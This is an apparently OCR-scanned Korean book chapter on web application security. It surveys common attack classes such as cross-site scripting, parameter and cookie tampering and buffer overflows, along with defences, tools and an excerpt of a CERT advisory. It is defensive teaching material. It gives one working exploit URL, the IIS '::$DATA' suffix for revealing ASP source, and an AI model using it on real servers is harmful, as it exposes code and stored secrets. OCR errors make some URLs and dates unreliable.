자료보관고 (data warehouse ) 와 자료시 장 (data mart ) 이 우후죽순처 럼 생기 고 있다. 그러 므 
로 자료기지준위 에서의 보안은 더 욱 중요하며 자료기지보안기 능에 대 한 고객의 요구는 
점 점 높아 지 고 있다. 다행 스럽 게 도 일 부 주요업 체들에 서 는 자기 들의 제 품일 식내 에 세 
밀통제를 강구할수 있는 기능들을 통합해 넣음으로써 보안요구에 호응하기 시작하고 
있 다. 

인 터네 트는 사람들이 정 보를 다루고 주고받는 방식 을 계 속 변경 시 키 고 있 다. 확장표 
식언어 ( XML ) 와 같은 새로운 고급언어들이 기준으로 되고 있으며 이러한 언어가 있음으 
로 하여 의뢰기 와 봉사기，대상과 공정 간의 운용조작호환성 이 약속되 여 있는것 이 다. 이 
편에 있는 두개의 장들은 이 언어의 우점들을 남김없이 리용할수 있는 가능성들과 그 단 
점 들에 대 하여 고찰하며 독자는 그 도구를 어 떻게 하면 잘 리용하면서도 응용보안을 유 
지하겠는가에 대하여 알게 된다. 

인 터 네 트 및 Web 관련 응용프로그람들을 계 속 개 발리 용함으로써 Web 관련 프로그람응 
용코드에 있는 잠재적취약성들을 녹여 낸 실례들을 우리는 많이 보아 왔다. 이 편에서는 
Web 응용보안실천사항들과 제품에 대한 권고를 다투게 된다. 특히 이 장에서 필자들이 
중요하게 강조하려고 하는것은 응용개발속도가 빠르고 시장실현에 대한 긴박성이 매우 
높은 최근에 사용자에 대한 교육과 강습이 응용프로그람개발자들에 게까지 확대되여 야 한 
다는것 이 다. 

이 편에는 마지막으로 모든 보안개념들을 하나의 완결된 계로 묶어 주는 장이 하나 
있다. 필자는 고유한 보안환경을 형성하는 여러 학문들을 탐구하는데서 거시적인것과 미 
시 적 인것 을 결합시 킴 으로써 메인프레 임시 대 에 적 용되 였던 개 념 들이 새 보안세 계 질서 에 
부합되게 하였다. 
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제 2 7 장. Web 응 용 보 안 


맨리 엔드리스 


요즘 Web 상에서 주권시세를 알아 보며 새로운 봉사형 태를 청구하며 어느것 이 나 구 
매하는 등 거의 모든것 을 다 할수 있을가，누구나 다 하나의 Web 응용프로그람을 가지 고 
있는것 같다. 그런데 정 확히 그것 이 무엇을 의 미할가. 

Web 응용프로그람들은 구별할수 없는 무한의 프로그람들이다. 여기 에는 수많은 각이 
한 구성요소들과 봉사기들이 들어 있다. Web 응용이라고 할 때 여기 에는 보통 Web 봉사기， 
응용봉사기，자료기 지봉사기 가 속한다. Web 봉사기 는 말단사용자를 위한 그래 픽 사용자대 
면부를 제 공하며 응용봉사기 는 업무론리흐름을 제 공하며 자료기 지봉사기 는 응용기 능전반 
에 필요한 자료를 담고 있다. 

Web 봉사기 는 여 러 가지 각이한 방법 으로 응용봉사기 에 요구를 보내 며 말단사용자에 
게 변경된 Web 페지나 새 Web 페지를 다시 보낸다. 이러한 방식들에는 공통관문대면부 
(CGI: Common Gateway Interface), Microsoft 회사의 능동봉사기페지 (ASP:Active Server 
Page), 쟈바봉사기폐지 (JSP: Java Server Page) 가 있다. 일부 경우에는 응용봉사기들로 공 
통객 체 요구중개 자구조 (CORBA: Common Object Request Broker Architecture) 와 인 터 네 트객 
체 요구중계 자사이규약과 갈은 요구중계대 면부를 지 원하기 도 한다. 

Web 응용보안 


모든 응용이 다 창조되거 나 실행되거 나 동일한것은 아니 다. Web 응용의 결여는 신속 
히 최 신의 망으로 쉽게 퍼져 나가게 된다. 왜 그런가? Web 응용프로그람들은 다 다르면 
서도 또 다 같은것들이기때문이다. 이것들은 다 같이 꼭 같은 몇개 안되는 Web 봉사기상 
에서 가동하며 곡 같은 매 점 에서 산 쏘프트웨어 이며 꼭 갈은 응용봉사기와 자료기지봉 
사기 를 리용하나 그 응용프로그람들의 일부라도 자체 의 코드를 가지 고 있는것 으로 하여 
서 로 다르다. 회 사들은 시 간적 여유나 자원 이 부족되 여 인 터네 트로 진출하기전에 자기 들 
이 가지 고 있는 봉사기 를 충분히 경 화시키거 나 전면검 사해 보지 못하군 한다. 

또한 많은 프로그람작성자들은 안전한 응용프로그람을 개 발하는 방법을 모르고 있다. 
아마 그들은 지 금까지 항상 보안상 결점 이 발견되 여 도 큰 파국적결과를 가져 오지 않는 
단독응용프로그람들이 나 인트라네 트 Web 응용프로그람들을 개 발하였을것 이 다. 

결국 많은 Web 응용프로그람들은 봉사기，응용프로그람，회사에서 개발한 코드들에 
취 약하다. 그 응용프로그람이 정 확히 기 능을 수행하려 면 포구 80( 혹은 SSL 에 는 433) 이 열 
려 있어야 하기때문에 이러한 공백들은 울타리방화벽보안에까지 침투해 들어 온다. Web 
응용공격 들에 는 Web 응용에 대 한 봉사거 부공격 , Web 폐 지내 용바꾸기，신용카드번 호와 같 
은 회사 및 사용자기밀정보훔치기가 있다. 



이 문제점들은 어 느 정도 범 람하는가. 2000년말의 몇달간에 다음과 같은 이 야가들이 
뉴스감으로 되였다(이것들은 다 보도에 나온 이야기들이다.). 한 해커는 Egghead.com 에 
뚫고 들어 와 370 만명 의 고객 들의 구좌들을 열 어 놓은것 으로 추정 되 였 다. 몇주 지 나서 야 
그 회사는 해커가 고객신용카드번호들에는 접근하지 못했다고 말하였다. 이쯤되면 많은 
신용카드번호들이 무효화되고 이 회사의 명성은 이미 손상된것이다. 다른 한 해커는 
Creditcards.com 에 대 한 강탈행 위 에 나섰는데 그는 이 회 사의 싸이 트를 뚫고 들어 가 5 만 5 
천개 이 상의 신용카드번호를 도적 질하였다. 그 해커 는 어 느 한 Web 싸이트에 그 신용카드 
번호를 게시하고 회사에서 돈을 내면 그것들을 취소하겠다고 하였다. Eve.com 의 Web 응 
용프로그람에서 하나의 바그가 생겨 고객들은 URL 에서 번호하나만 바꾸면 다른 사람들 
의 주문을 쉽게 볼수 있었다고 한다. 그 바그는 고객들의 이름과 주소，제품，주문날자， 
고객들이 쓰는 신용카드형태와 신용카드번호의 마지막 다섯자리수자들을 다 보여 주게끔 
되 여 있 었 다. IKEA 의 상품명세 서주문싸이트의 Web 응용프로그람에 서 는 하나의 바그가 생 
겨 고객주문정보가 다 로출되였다. 마지막으로 Amazon.com 의 Web 응용프로그람에 있던 
하나의 바그에 의하여 그 많은 고객 들의 전자우편주소들이 공개 되 였 다. Web 응용프로그 
람에 의한 공격은 이 러한 정도의 위협 으로 되여 CERT 는 2000 년 2 월에 이 문제와 관련 
한 권고안을 발표하였다(표 27 — 1 을 보든가 www.cert.org/advisories/CA-2000-02.html-i- 찾 
아 가 보기 바란다). 

Web 공격이 일반적인 공격과 다른점은 Web 공격이 탐지하기 힘들며 그 공격자는 인 
터네트의 임의의 사용자，지 어는 인증된 사용자로 될수 있다는것 이 다. 현재까지 이 분야 
가 상당히 도외 시 되 여 온것 은 회 사들 이 Web 공격 을 탐지 도 못하는 방화벽 과 침 입탐지장 
치들을 가지고 자기의 망을 보호하느라고 씨름질하고 있는것과 관련된다. 

정확히 Web 응용이 공격에 어느 정도로 취약한가. 해커들이 교묘하게 리용할수 있는 
점들은 다음과 갈다. 

• 이미 알려 진 취약점들과 설정오유 

• 숨은 마당 

• 뒤문선택항목과 오유수정 (debug) 선택항목 

• 싸이 트간의 스크립링 

• 파라메터수정 

• 무키 조작 

• 입력 조작 

• 완충기 범 람 

• 직접접근열람 

알려 진 취약점들과 설정오유 

알려 진 취 약점 들에 는 Web 응용에 서 사용하는 조작체 계 들과 제 3 자적인 응용프로그람 
에서 나타나는 모든 바그들과 교묘한 점들이 속한다. 가장 널리 사용되는 Web 봉사기들 
의 하나인 Microsoft 회사의 Internet Information Server(IIS) 는 보안상 결함이 많은것으로 하 
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여 유명 하다. 2000 년 10 월에 나온 취 약점 인 Extended UNICODE Directory Traversal 취 약점 
(《 보안불레찐》 MS00-078 에서 공개됨》은 IIS 가 유니 코드 (UNICODE) 처 리를 잘못한것을 
교묘히 리용하여 공격 자로 하여 금 특수한 URL 을 입 력한후 Web 봉사기 와 곡갈은 론리 적 
구동장치에 있는 임의의 파일에 접근하게 한다. 공격자는 IUSR-machinename 구좌하에 있 
는 파일들을 쉽게 실행시킬수 있다. IUSR-machinename 은 IIS 를 위한 닉명의 사용자구좌 
이 며 기 정값으로는 Everyone 파 Users Group 의 한 성 원이 다. Microsoft 는 이 문제 해 결을 
위한 보강판을 출하하였는데 http://www.microsoft.com/technet/security/bulletin/MS00-078.asp 
에서 내 리적재할수 있다. 

이러한 문제들은 설정오유들 즉 불안전한 기정값설정을 가지고 있거나 관리자들에 
의하여 불안정하게 설정된 응용프로그람들에도 있다. 그 대 표적실례는 임의의 사용자가 
한 체계에 있는 디렉터리경로를 제마음대로 넘나들게끔 Web 봉사기가 설정된것을 들수 
있 다. 이 렇 게 되 면 그 Web 봉사기 에 기 밀 정 보가 있 는 경 우(이 것 자체 가 큰 보안위 험 이 다) 
통과암호나 원천코드，고객정보와 갈은 기밀정보가 루출될수 있다. 다른 하나의 설정오유 
의 실례는 Web 봉사기에서 사용자들에게 실행허가를 주게끔 되여 있는 경우이다. 디렉터 
리를 넘나 들게 된 경우와 결합되면 이것도 Web 봉사기에 손상을 주게 된다. 

숨은 마당 

숨은 마당은 숨겨 진 HTML 양식마당을 말한다. 흔히 여 러 응용프로그람에 서 는 이 
마당을 리용하여 체 계 통과암호나 상품가격 들을 표시한다. 이 름은 숨은 마당이 라고 부르 
지만 이 마당은 그렇게까지 숨겨 지지 않은것이다. Web 페지상의 View Sour 를 실행시키 
면 보일수 있다. 여러 Web 응용프로그람에서는 나쁜 사람들이 HTML 에 있는 이 마당을 
수정하여 상품을 눅은 가격 이 나 전혀 가격을 물지 않고 구매할수 있게끔 기회 를 조성 하 
고 있다. 이러한 공격들이 성공할수 있는 원인은 거의 모든 응용프로그람들이 돌아 오는 
Web 페지를 확인 혹은 비준하는 체계를 가지고 있지 않는데 있다. 이 응용프로그람들은 
돌아 오는 자료가 보냈던 자료와 같을것 이 라고 전제하는것 이 다. 

뒤문 및 오유수정선택항목 

개 발자들은 흔히 응용프로그람들에 뒤문을 만들어 놓고 오유수정 선택 항목을 선택하 
여 오유퇴 치 를 쉽 게 할수 있도록 한다. 이 렇게 하면 개 발과정에는 좋은 점 이 있지 만 인 
터네 트에 올려 놓는 최 종프로그람애 까지 그대 로 이 런 항목들이 남아 있게 된다. 사용자 
들이 통과암호 없이도 접속개시하게 하거 나 응용프로그람설정 에 직 접 접근할수 있는 특 
별 한 URL 로 접 속개 시할수 있 는 뒤문들은 아주 인 기 있 다. 

이러한 Web 응용프로그람의 취약점이 나타나게 된 원인은 체계운영에서 지켜야 할 
규범 화된 방책 과 절 차들이 부족한데 있 다. 이 취 약점 을 처 리 하기 위한 주요조치 는 뒤 문 
을 제거 하고 오유수정선택 항목의 사용을 금지시키는것 이 다. 이 단순한 조치를 취하면 응 
용프로그람의 취 약점들이 극력 줄어 들게 된다. 그러나 응용프로그람설치와 기동을 빨리 
해야 한다는 요구로 하여 이러한 파정들이 준수되지 못하기때문에 이 단계는 흔히 생략 
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되 군 한다. 

싸이트간 스크립팅 

싸이트간 스크립링은 많은 의미를 담고 있기때문에 한마디로 정의하기 어렵다. 일 
반적으로 싸이트간 스크립링 이 란 다른 원천지에서 보내 온 페지들에 코드를 삽입하는 
공정 을 말한다. 싸이트간 스크립링 은 우선 HTML 양식 에 서 교묘하게 리용될 수 있다. 
사용자는 이 HTML 양식 에 그 어 떤 정 보를 삽입하여 그것 을 봉사기 에 보낸 다. 봉사기 
는 그 양식 에 있는 자료입 력내 용을 받았다가 그것 을 HTML 폐 지 로 사용자에 게 다시 
보내여 그 입력내용을 확인하게 한다. 사용자가 만일 JavaScript 프로그람과 같은 코드 
를 어떤 양식마당에 타자쳐 넣으면 그 폐지가 현시될 때 의뢰기열람기가 그 코드를 
처 리하게 된 다. 

싸이트간 스크립링 은 신뢰 성 을 위 반하는것 으로 된다. 사용자들冬 Web 봉사기 가 보낸 
정보를 신뢰성이 있기때문에 그 어떤 나쁜것이 있으리라고 보지 않는다. 그런데 싸이트 
간 스크립링 을 허 용하게 되 면 봉사기 에 악성 코드를 주입하여 그것 이 다른 사용자의 를퓨 
터 에 가서 실행 되 게 된다. 전자게 시 판에 게 시자료를 투고하는것은 바로 싸이트간 스크립 
링의 좋은 실례이다. 바로 이 게시자료에 악성 JavaScript 코드를 삽입해 넣는것이다. 어떤 
사용자가 그 전자게시판자료를 무심 히 접속해서 보는데 그때 바로 봉사기가 HTML 을 이 
악성코드와 함께 보내여 현시되게 한다. 그러면 Web 봉사기가 보내여 온 그것이 타당한 
코드인줄 알고 그 사용자의 열 람기 는 코드를 실행시 킨다. 

과라메터수정 

파라메터수정 이 란 사용자가 보지 말아야 할 정보를 검색할 목적 으로 URL 렬을 함부 
로 조작하는것을 말한다. URL 에 포함되여 있는 SQL 호출신호를 통하면 Web 응용프로그람 
의 후위자료기지 에 접 근할수 있게 된다. 사용자가 나른 마음을 먹 게 되 면 이 SQL 코드를 
조작하여 그 자료기지에 보관된 모든 사용자명단，그들의 통과암호，신용카드번호 등을 
검색해 낼수 있게 된다. 앞에서 언급한 Eve.com 의 결함은 바로 이러한 파라메터수정의 
결과였다. 

쿠키조작 

쿠키 조작이 란 무키 에 담겨 진 자료를 수정 변경하는것 을 말한다. Web 싸이 트들은 사 
용자 ID ， 통과암호，구좌번호 등을 포함한 사용자콤퓨터에 대한 무키들을 보관한다. 나쁜 
마음을 먹은 사용자는 이 쿠키들을 못쓰게 하거나 변경시켜 자기것이 아닌 남의 구좌들 
에 접근할수 있게 된다. 

또한 공격자들이 사용자들의 무키들을 도적질하여 구좌들에 접근할수 있다. Web 전 
자우편 이 나 직 결은행 과 갈은 Web 응용에 서 는 흔히 쿠키자료를 리용하여 사용자인증을 
한다. 만일 해커들이 쿠키에 접근하여 그 무키를 자기의 열람기에 끌어 오면 사용자 ID 
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와 통과암호를 입력하지 않고 혹은 다른 형태의 인증을 하지 않고도 사용자구좌에 접 
근할수 있게 된다. 구좌접근은 대화가 진행되는 동안에만 (Web 응용프로그람들이 대화 
시 간경 과를 규제 하고 있으므로) 가능하지 만 손해 는 이 미 다 본것 이 나 다름없 다. 몇분이 
면 공격 자는 쉽 게 남의 은행 구좌를 깡그리 털 고 은행 총재 를 위 협하는 전자우편을 보낼 
수 있게 된다. 

입력조작 

입 력조작이 란 CGI 스크립트로 처 리되는 HTML 양식입 력사항들을 조작하여 체계명 령 
을 실행시키는것을 말한다. 실례 로 CGI 를 사용하여 다른 사용자에 게 정 보를 보낼수 있는 
양식의 입력자료를 조작하여 봉사기에 있는 통과암호파일을 자기에게 끌어 오거나 그 봉 
사기에 있는 모든 파일들을 다 지워 버릴수도 있다. 

완충기 범람 

완충기 를 범 람시 키 는것 은 악성사용자가 굉 장한 량의 자료를 봉사기 에 보냄 으로써 봉 
사기를 굳어 지게 하는 고전적 인 공격기법 이 다. 봉사기에는 완충기 가 있어 여기 에 이 자 
료들을 받아 기 억한다. 받은 자료가 완충기용량보다 큰 경 우에 는 탄창기 억 이 자료의 어 
떤 부분들로 꽉 차게 된다. 만일 이 자료가 프로그람코드이면 체계는 그 탄창기억에 꽉 
차 있는 임의의 코드를 실행시 킬것 이 다. Web 응용프로그람완충기범 람공격의 실례는 이 
경 우에 도 HTML 양식 을 리용하는것 이 다. 양식 의 어 떤 마당에 들어 가 있는 자료가 너 무 
크면 이것도 역시 완충기의 범람조건으로 될수 있다. 특별히 기형적으로 된 양식자료가 
있으면 봉사기 가 임의의 코드를 실행하게 되 여 공격 자로 하여금 그 체 계에 대 한 조종권 
을 완전히 장악할수 있게 할수도 있다. 

완충기 범 람에 관하여 더 알려 면 http://www.cultdeadcow.com/cDc-files/cDc-351/ 에 서 
DMog 가 쓴 “Tao of a Buffer Overflow” 라는 책을 보면 된다. 기타 참고서들로서는 
http://www2.linuxjoumal.com/lj-issues/issue61/2902.htmHl 있는 “ A Look at the Buffer- 
Overflow Hack” 그리 고 http:/ 八 vww-ndaif.Up6.fr 八 villy/security 에 있는 “UNIX Security: The 
Buffer Overflow Problem” 을. 들수 있 다. 

직접접근열람 

직접접근열람이란 인증을 거처야 할 Web 페지에 직접 접근하는것을 말한다. Web 응용 
프로그람들이 제대로 설정되여 있지 않는 경우 악성사용자들은 기밀정보가 담겨 진 URL 
들에 직접 접근할수 있으며 만일 값을 내고 보아야 하는 경우 회사에 재정적손실을 줄수 
있 다. 

Web 응용프로그람에 대 한 공격 은 각 회사의 자산，자원，명성 에 막대한 손실을 줄수 
있다. Web 리용에서 공격위험이 증가되기는 하지만 이 위험을 완화시킬수 있는 해결책들 
은 많다. 
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예 방 


Web 응용공격들을 예방할수 있는 최선의 방도는 교육을 주고 경각성을 높이는것이다. 
개발자들에게는 안전한 코드화과정에 대한 교육을 주며 경영측에는 충분한 시험과정을 
거치기전에 어떤 체계를 가동시킬 때 생길수 있는 위험성에 대하여 충분히 알려 주어야 
한다. 또한 관리자들과 보안전문가들은 판매업체의 Web 싸이트, 보안 Web 싸이트，보안우편 
관계 목록 등을 항시 적 으로 감시 함으로써 Web 응용프로그람들과 봉사프로그람들에 새 로운 
취약점들이 나타나지 않았는가를 알아 내야 한다. 우수한 정보를 제공하는 최상의 보안 
싸이트들로서는 securityfocus.com, securityportal.com, ntsecurity.com, linuxsecurity.com 등을 
들수 있 다. 회 사나 기 관자체 로 개 발한 응용프로그람들이 얼 마나 안전한가에는 관계 없 이 
공격 자들은 자료기 지봉사기 에 있 는 하나의 취 약점 을 뚫고 들어 와 모든것 을 다 접 근할수 
沒다. 

개발자들에 대한 교육에서 첫째도 둘째도 셋째도 중요한것은 그들이 들어 오는 자료 
는 절대로 믿지 않게 하는것이다. 말단사용자들을 믿기 어려우므로 안전한 Web 응용프로 
그람을 만들기까지는 많은 시간이 필요하게 된다. 개발자들은 오직 자기가 통제나 조종 
할수 있는것만 믿어야 한다. 말단사용자에 대한 통제를 할수 없으므로 개발자들은 들어 
오는 모든 자료들은 다 위 험한것 으로 가정 하지 않으면 안된 다. 사용자열 람기 로 보냈 던것 
이 변하지 않고 되돌아올것이라고 생각하거나 Web 양식에 입력된 자료가 정확하다고 가 
정하는 일이 절대로 있어서는 안된다. 고객주소를 적어 넣어야 할 양식에 《<》기호가 
하나 꼭 있어야 될가. 이러한 기호는 흔히 코드를 가리킨다. 려과기를 추가하거나 입력검 
사를 하면 Web 공격 의 대 부분을 확고히 제 거할수 있 다. 

개발자들은 또한 코드화과정에 그 응용프로그람에 모든 보안대책들을 다 포함시켜야 
한다. 물론 매 사용자가 자기 이름과 통과암호로 인증을 받고 그 응용프로그람에 접근하 
겠지만 개발과정에 시간을 절약한다고 하면서 개발자들이 닉명으로 Web 봉사기구좌를 사 
용한다면 일련의 골치거리가 생길수 있다. 례를 들어 인증코드에 바그가 있어도 그 응용 
프로그람을 완성하기 며칠전에 혹은 완성후에야 발견되는 경우도 있을수 있다. 마지막순 
간에 바그를 발견한다는것은 그 응용프로그람의 봉사개시가 늦어 지거나 바그가 있는 채 
로 봉사를 개시 한다는것을 의미 한다. 이 두 경우 다 위 험하므로 개 발공정의 전반에서 모 
든것 을 다 포함시 켜 고려해 야 한다. 

가능하면 관리 자구좌나 운용관리 자 (superuser) 구좌를 리 용하지 말고 응용프로그람을 
가동시 켜 야 한다. 뿌리 준위 에 서 모든것 을 가동시 키 는것 이 접 근하는데 시 간절 약하는것 같 
이 생 각되 지 만 그렇 게 하면 화를 스스로 청하는것 으로 된 다. 운용관리 자구좌로 모든것 을 
가동시키면 Web 응용프로그람사용자는 누구나 다 자료기지표에 완전한 쓰기접근을 할수 
있 게 될 것 이 다. 악성사용자는 SQL 코드로 몇 가지 URL 들을 수정 하기만 하면 자료기 지 전 
부를 쉽게 지워 버릴수 있다. 특권의 최소화라는 보안방책 을 준수하는것 이 최상의 방책 
이 다. 특권의 최 소화란 사용자에 게 해 당 과제 를 수행하는데 필 요한 최 소수준의 허 용사항 
들을 주는것을 말한다. 그렇게 해도 사용자는 Web 을 잘 리용하며 회사는 회사대 로 사용 
자접근이 제한되였으니 비법적인 행위들이 크게 없을것이라고 안심하니 좋을것이다. 
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HTTP GET 요구신호를 리용하여 의뢰기로부터 봉사기에로 기밀자료를 보내게 되 
면 여러가지 보안허점들이 생기므로 이것을 피해야 한다. 이 GET 요구신호는 Web 봉사 
기사용기록부에 평문으로 등록되므로 누구나 다읽어 볼수 있다. 이러한 GET 요구신호 
로 봉사기 에 전송된 신용카드번호도 Web 봉사기 사용기 록부에 평문으로 등록되 여 있게 
된 다. 공격 자가 Web 봉사기 사용기 록부에 접 근하기 만 하면 자료기 지암호화를 리용하여 
신용카드번호를 보호하려고 해도 소용 없다. SSL 도 역시 이 문제를 예방하지 못한다. 
SSL 은 전송과정 에만 자료의 암호화를 보호하므로 GET 요구신호는 이때 에도 Web 봉사 
기 에 평문으로 기 록되 게 된 다. 이 GET 요구신호는 또한 고객열 람기 의 리 력파일 에도 보 
관될 수 있다. 

그러므로 의 뢰 기와 Web 봉사기사이의 자료전송에는 HTTP POST 명 령 을 사용해 야 한 
다. POST 명 령 은 HTTP 를 리용하여 정 보를 넘 기 므로 Web 봉사기 에 그 사용기 록이 남아 
있지 않게 된 다. 정 보는 그래 도 평문으로 보내 여 지 므로 SSL 을 리용하여 망에 서 의 엿보 
기공격을 막아야 한다. 

JSP 와 ASP(*SP) 는 흔히 Web 응용프로그람개발에 리용되는데 흔히 디렉터리，자료기 
지 등에 접속할수 있는 수정불가능하게 된 통과암호를 가지고 있다. 일부 사람들의 생각 
에 는 봉사기 가 그 코드를 처 리하여 그 결 과물로 Web 폐 지 를 현 시하므로 좋다고 할수 있 
지 만 언제 나 그렇게 되지 않으므로 수많은 취 약점들이 있다. 이것을 증명할수 있는 가장 
간단한 해커기 법 으로서는 IIS 바그인데 ::紅) ATA 가 어느 한 URL 의 끝에 붙었을 때 이 IIS 
바그로 하여 ASP 의 원천코드를 볼수 있게 된것도 그 실례이다. 례를 들어 
http://www.site.com/page.asp::$DATA 를 주면 그 페지의 원천코드와 거기에 담긴 짭짤한 비 
밀까지 현시될수 있다. 

개 발자들은 정 보를 루출시킬수 있는 HTML 코드주석 과 오유경 고문에 대 해서 도 언제 
나 인식을 잘하여야 할것이다. 이것들이 직접 공격을 유발시키지는 않으나 공격자는 이 
것 을 보고 그 응용프로그람의 구조를 충분히 알아 내 여 공격 을 성 과적 으로 단행할수 있 
을것이다. 실례로 봉사기의 스크립트의 일부였던 접속문자렬이 주석에 포함되여 나타나 
면 공격 자는 귀 중한 정 보를 엄 는것 으로 된 다. 

오유경 고문도 주의해 야 할 필 요가 있 다. 일 부 오유경 고문들은 Web 봉사기 의 물리 적 
경 로에 대 한 정 보를 알려 주므로 그것 이 Web 봉사기 공격 에 리용될 수 있 다. 일 부 오유경 
고문들은 현재 사용중에 있는 해 당 자료기 지봉사기 나 응용프로그람봉사기 에 대 한 정 보를 
로출시킬수 있다. 총괄해 보면 오유경고문들은 그 어떤 특정한 위험을 일으키지 않지만 
이 경 고문들에 서 조금씩 수집한 정 보를 리 용하여 응용프로그람의 구조를 알수 있으며 공 
격에 대한 세밀한 준비를 할수 있다. 

싸이트간 스크립링은 물리치기 힘든 매우 효과가 높은 공격이다. 현재 일치한 의견 
을 본 해결책은 HTML 부호화를 리용하는것이다. HTML 부호화에서는《<》과《>》와 
갈은 특수부호들에 설명 어가 할당된다. <는 &lt 이 고 >는 &gt 이 다. 부호화된 문자는 열 람 
기 에 보내지면 실행되지 않고 현시된다. 앞에서 설명한 전자게시판공격같은것들을 예 방 
하자면 입 력 자료들이 부호화되 여 야 한다. 일부 제품들에는 이것 을 위한 도구가 포함되 여 
있 다. 실례 로 IIS 에 는 Server 항목에 HTMLEncode 가 있으므로 여 기서 입 력문자렬을 받아 
자료를 부호화된 형 식 으로 출력해 준다. 
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안전한 부호화는 안전한 Web 응용프로그람개발에 필요되는 여러 내용들중의 하나 
에 불과하다. 리상적 으로 보건대 보안을 응용프로그람개 발의 전과정 에 서 토론되 고 계 
획화되고 포함되여야 할 문제인것이다. 이렇게 되는 경우 최종결과물인 Web 응용프로 
그람은 진정으로 안전하고 공고한것으로 될것 이다. 또한 Web 응용프로그람을 계속적 
으로 감시，보수할수 있는 절차들이 마련되여야 그 응용프로그람의 보안이 유지될것 
이 다. 


기술도구와 해결책 


안전한 부호화과정 이 안전한 Web 응용프로그람을 낳게 하지만 이것만으로는 충분하 
지 못하다. Web 응용프로그람을 검열하고 안전하게 할수 있는 도구들과 응용프로그람들 
은 여러가지가 있다. 

Web 응용프로그람이 CGI 스크립트를 사용한다면 RFP (제한의뢰서)에 있는 whisker . pl 스 
크립트를 가지고 그 응용프로그람을 스캔할수 있다. 이 Perl 스크립트는 알려 진 CGI 취약 
성 들을 알아 보기 위 하여 싸이 트를 스캔 한다. 이 스크립 트는 www . wiretrip . net / rfp 에 서 무 
료로 구입할수 있 다. 

원천코드를 철저히 검토해 보는것도 매우 중요하다. 전문가를 한명 고용하여 전반 
적 으로 검 토하는것 은 비 용이 상당히 들지 만 이 과정 을 기 관내 에서 진행할수 있는 프 
로그 람도 여 러 가지 가 있 다. NuMega ( www . numega . com )， L 0 pht ( www .10 pht . com / slint . html )， 
ITS 4( www . rstcorp . com / its 4), LcUnt ( lclint . cs . virginia . edu ) 들은 모두 원천코드검토프로그람들을 
제공한다. 

몇가지 제품들은 Web 응용보안에 특효가 있다(그 제품들의 수는 급속히 늘어 나고 
있 다). Sanctum 회사의 AppShield 제품 ( www . Sanctuminc . Com ) 은 이 장에서 언급된 모든 취약 
점들이 Web 싸이트에서 제기되지 않게 해준다. AppShield 는 Web 응용프로그람을 위한 방 
화벽처럼 작용함으로써 승인된 자료와 승인된 요구신호만 그 Web 응용프로그람에 넘어 
가도록 해춘다. 이 회사에는 또한 응용프로그람들의 취약점을 검사하는데 쓰이는 
AppScan 도 있다. 

S . P . I . Dynamics 회사 ( www . spidynamics . com ) 의 Webinspect 응용프로그람은 Web 페 지，스크 
립 트，고유독점 코드， 쿠키 등 Web 응용취 약점 들을 찾아 준다. WebDefend 는 Sanctum 회 사의 
AppShield 처 럼 Web 응용공격 들에 대 한 실시 간 탐지，경 고，반응을 진행 한다. 

시장에 나돌고 있는 몇가지 다른 제품들도 일부 Web 공격으로부터 Web 응용프로그람 
들을 보호할수 있 다. Encercept 와 원 천공개 형 인 Saint Jude 는 새 로운 침 입 방지 응용프로그 
탐으로서 공격 이 진행되기전에 조작체계의 준위 에서 공격 을 저지시 킨다. 이 제 품들은 조 
작체 계준위 에서 완충기범 람공격 이 나 싸이 트간 스크립링을 저지 시켜 Web 응용프로그람을 
보호할수 있 다. 또한 SecureWave 회사에서 출품한 SecureStack ( http :// www . securewave . com / 
html / secure _ stack . html ) 은 Windows NT 와 Windows 2000을 사용하는 봉사기들에서 완충기 
범 탐을 막는다. 
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요 약 


Web 응용프로그람들에 있는 빈 구멍들을 리용하는것은 순식간에 봉사기와 거기에 
있는 기밀정 보들에 대 한 접근을 할수 있는 좋은 공격방법 으로 된다. 판매 업체들에서 
제 공하는 응용프로그람이든 회사자체안에서 만든 프로그람이든 거기 에는 공격 자가 보 
지 말아야 할 정 보를 읽 어 보며 지 어 그 체 계전반을 장악할수도 있는 여 러 가지 방법 
이 있다. 

이러한 빈 구멍들이 있게 되는것은 프로그람작성자들과 응용개발자들이 안전한 프로 
그람기법에 대한 교육을 옳바로 받지 못한것과 관련된다. 정확히 교육을 받았다고 하는 
사람들도 빈 구멍들을 제대로 막는 작업을 빈틈없이 하지 못하고 있는데 그 원인은 제품 
의 시장실현기일에 대한 촉박감으로 하여 그 응용프로그람들의 안정성을 정확히 보장할 
만한 시 간적 여 유가 없기 때 문이 다. 

Web 응용프로그람들에 있는 주되는 보안상구멍들에는 알려 진 취약점들, 설정오유， 
숨은마당，뒤 문 및 오유수정 선택 항목，싸이 트간 스크립링，파라메터 수정，쿠키 조작，입 력 
조작，완충기범 람，직접접근열 람이 있다. 

이러한 취약점들로부터 응용프로그람들을 보호하자면 개발자들에 대한 교육이 관건 
적이다. 또한 취약점들을 발견하고 응용프로그람들이 이러한 취약점들로 하여 해커공격 
을 받지 않게 보호할수 있는 몇 가지 판매되는 도구들과 제품들도 중요하다. 

결론적으로 말하여 Web 응용프로그람들에 대한 공격들은 나날이 급속히 증가되 
는 위험이라고 말할수 있다. 이러한 Web 응용프로그람에 의하여 전 세계의 누구에게 
나 다 접 근가능한 자료들과 자원들을 보호하는데 서 관건적역 할을 하는것 은 교육과 
경 각성 이 다. 


표 27-1 콤퓨터비상대응림 ( CERT ) 정황보고 CA -2000-02 

의로 I 기 Web 요구신호에 삽입된 악성 HTML 태그 


이 정 황보고는 CERT 조정쎈터，국방성 (DoD)CERT, DoD 콤퓨터망방위 를 위 한 합동특별 
수사대 (JTF-CMD )， 련 방를퓨터 사건대 웅본부 (FedCIRC )， 전국기반시설보호쎈 터에서 공동으로 
발표되고 있다 . 

원 본발행날자 : 2(X)0 년 2 월 2 일 
최 종수정날자 : 20W 년 2 월 3 일 

해당되는 체계들 

• Web 열 람기 

• 미확인입력사항에 기초하여 Web 폐지를 동적으로 생성시키는 Web 봉사기들 

개 팔 

Web 싸이트는 신뢰성이 없는 원천에서 온 미확인입력내용에 기초하여 동적으로 생성된 
폐지에 악성 HTML 태그나 스크립트를 부정적으로 담고 있을수 있다 . 생성된 폐지가 정확히 
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코드묵러여 필요 없는 스크립트실행을 하지 않도록 Web 봉사기가 정확히 담보되지 않은 경우 
그리고 악성 HTML 이 사용자에게 제시되지 않도록 입력사항이 승인되지 않는 경우 문제가 
제기될수 있다. 


I. 해설 
배 경 


대부분의 web 봉사기 들은 자기 로부터 내 리 적재한 Web 폐지 에 포함된 스크립 트들을 해 석 
